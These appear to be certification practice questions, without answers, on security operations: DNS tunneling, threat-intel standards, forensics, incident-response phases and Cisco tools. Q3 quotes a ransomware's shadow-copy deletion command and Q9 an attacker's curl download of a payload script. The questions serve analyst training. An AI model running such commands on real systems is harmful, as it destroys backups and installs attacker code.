Q1

A SOC analyst is reviewing NetFlow data from Cisco Secure Network Analytics (formerly Stealthwatch) and observes a sustained, low-volume stream of outbound traffic on TCP port 53 from a database server. This server is not authorized to perform DNS resolution for external domains. The traffic pattern avoids high-volume thresholds that would trigger standard alerts. Which analytic technique is most effective for identifying this potential DNS tunneling activity?

Q2 (Multiple answers)

A DevSecOps engineer is building a Python script to automate the enrichment of IP address indicators using the Cisco SecureX API. The script must check if an IP address has a malicious disposition and, if so, create a new sighting associated with a specific incident. Which two API endpoints are essential for this workflow? (Select TWO).

Q3

During a malware analysis process in a sandbox environment, a file is observed performing the following sequence of actions:

1. Executes `vssadmin.exe Delete Shadows /All /Quiet`.
2. Makes numerous file modifications with high entropy in user directories.
3. Establishes an outbound connection to a known Tor exit node.
4. Deletes itself from the original execution path.

Which type of malware is most likely being analyzed?

Q4

A SOC team is implementing a Threat Intelligence Platform (TIP) to automate the consumption of threat feeds. They need to use a standardized data format for representing cyber threat information and a protocol specifically designed for exchanging it. Which combination of standard and protocol should they implement?

Q5

An incident responder is performing a forensic investigation on a compromised Windows Server. The initial alert from Cisco Secure Endpoint indicated a fileless malware attack executed via PowerShell. The server has been successfully isolated from the network to prevent lateral movement. To adhere to forensic best practices, the responder must collect evidence based on the order of volatility. Which action must be performed FIRST?

Q6

A cybersecurity architect is designing a security posture for a hybrid cloud environment. A key requirement is to prevent endpoints from connecting to known malicious domains, IPs, and URLs, regardless of whether the endpoint is on the corporate network or connected remotely. The solution must provide DNS-layer security and act as a secure web gateway. Which Cisco security product is best suited to meet these requirements?

Q7

True or False: In a CI/CD pipeline, static application security testing (SAST) is performed on running code in a production or staging environment to identify vulnerabilities.

Q8

A financial services company, FinSecure, is undergoing a security audit. The auditor needs to review the company's incident response procedures. FinSecure's SOC uses a playbook for handling suspected phishing attacks that result in a user credential compromise. The playbook is initiated when a user reports a suspicious email, which is then analyzed by a SOAR platform. The SOAR platform automatically extracts indicators (URLs, attachment hashes) and enriches them using threat intelligence feeds. If an indicator is found to be malicious, an alert is generated. The playbook requires a SOC analyst to then perform several actions: force a password reset for the affected user, search email logs for other recipients of the same phishing email, and block the malicious indicators at the firewall and web proxy. According to the standard NIST incident response lifecycle (SP 800-61), which phase encompasses the analyst's actions of resetting the password and blocking the indicators?

Q9

While investigating a compromised Linux host, an analyst discovers that the attacker gained initial access and then downloaded a script from a remote server using the command `curl -o /tmp/p.sh http://198.51.100.10/p.sh`. The analyst needs to understand the script's contents without executing it. Which command should the analyst use to safely view the script?

Q10

A security team uses a vulnerability scanner that reports a critical vulnerability (CVSS score 9.8) on an internal web server. However, the team determines that the server is located on a highly segmented network, is not accessible from the internet, and has a compensating control in place that mitigates the specific attack vector. How should this vulnerability be handled in the vulnerability management process?